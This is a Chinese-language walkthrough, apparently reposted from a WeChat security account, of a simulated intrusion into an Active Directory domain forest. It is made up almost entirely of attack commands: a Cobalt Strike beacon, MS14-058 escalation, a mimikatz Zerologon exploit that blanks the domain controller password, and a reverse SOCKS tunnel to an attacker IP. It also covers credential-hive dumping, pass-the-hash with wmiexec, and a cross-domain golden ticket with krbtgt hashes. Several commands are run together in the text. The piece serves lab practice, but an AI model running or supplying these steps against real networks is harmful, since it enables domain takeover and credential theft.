模拟内网实战,以钓鱼已进入内网开始
cs生成exe上线web服务器
设置beacon响应时间为0
第一步:提权
利用ms14-058进行提权
提权成功
进行arp协议信息收集
作用:查看是否有多网卡
指令:
shellarp -a
查看主机信息
作用:可以看到有域,查看补丁进行对应的提权
指令:
shellsysteminfo
收集网络全部信息
作用:可以看到主机名,域信息
指令:
shellipconfig /all
利用nbtscan扫描
作用:扫出真实内网ip进行下一步渗透
进行mimikatz上传
作用:方便进一步内网渗透
扫描是否存在cve2020-1472
回应存在
指令:
lsadump::zerologon /target:域控IP /account:域控主机名$shell mimikatz "lsadump::zerologon /target:10.10.3.6 /account:ziyu$""exit"
上传ew进行代理
指令:
ew_for_Win.exe -s rcsocks -l 1080 -e 888//将映射出的888端口返回到本地的1080端口
反向碰撞
原理:
我们攻击机开启了代理准备,也就是我们把888端口放到门口,谁指定我们的ip加这个端口碰撞便进行了代理连接
指令:
shellew_for_Win.exe -s rssocks -d 192.168.58.1(攻击机ip)-e888
利用cve2020将域控密码置空
指令:
lsadump::zerologon /target:域控IP /account:域控主机名$ /exploitshell mimikatz "lsadump::zerologon /target:10.10.3.6 /account:ziyu$ /exploit" "exit"
kali设置代理,这里就是对应之前的代理设置,我们将888放到门口被撞,1080则为我们自己用
获取散列值
作用:制作票据,破解md5等等都可以,个人比较喜欢黄金票据
指令:
proxychains impacket-secretsdump -no-pass -just-dcxiyou.dayu.com/ZIYU$@10.10.3.6
利用wmiexec连接
作用:连接域控制器了
指令:
proxychainspython3 wmiexec.py -hashes :e35c2b2d95f6ae63b75dbbff5195accb./[email protected]
将sam system security.save文件先导出后下载下来,并清理痕迹
指令:
reg save HKLMSYSTEM system.savereg save HKLMSAM sam.savereg save HKLMSECURITY security.saveget system.save ++
获取散列值
作用:获得各用户hash以及还原域防止出现问题
指令:
impacket-secretsdump-sam sam.save -system system.save -security security.save LOCAL
进行还原
指令:
proxychain spython3 reinstall_original_pw.py ZIYU 10.10.3.675df0c2187b6a79e46f26fa2fb16573a
这个时候再用之前获取到的管理员hash登录域控
指令:
proxychains python3 wmiexec.py -hashesaad3b435b51404eeaad3b435b51404ee:e35c2b2d95f6ae63b75dbbff5195accbxiyou.dayu.com/dayu@10.10.3.6
查看网卡信息,是否进攻正确
上线cs做中转,生成exe进行上线
kali直接上传上线
进行信息收集,这里21段机子未开
上传mimikatz利用信任关系制作票据进行攻击
先获取父子域sid
指令:
shell mimikatz "privilege::debug" "lsadump::lsa /patch/user:dayu$" "lsadump::trust /patch" "exit"子域:S-1-5-21-4076297317-3311262154-314974380
父域:S-1-5-21-3309395417-4108617856-2168433834-519
krbtgt哈希值:c696e9337845d8ada46612d047e40209
进行黄金票据攻击
显示成功
指令:
shell "kerberos::golden /user:administrator /domain:xiyou.dayu.com/sid:S-1-5-21-4076297317-3311262154-314974380/sids:S-1-5-21-3309395417-4108617856-2168433834-519/krbtgt:c696e9337845d8ada46612d047e40209 /ptt" "exit"
但是这里是失败了
创建域管理员账号
直接通过3389进行黄金票据
终于也是成功了
接着利用wmiexec进行父域的访问
指令:
wmiexec.exe administrator:QWEasd123@10.10.3.5
上传2.exe进行运行上线cs
这一套直线内网流程就结束收工了
原文始发于微信公众号(moonsec):内网渗透:域森林实战
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论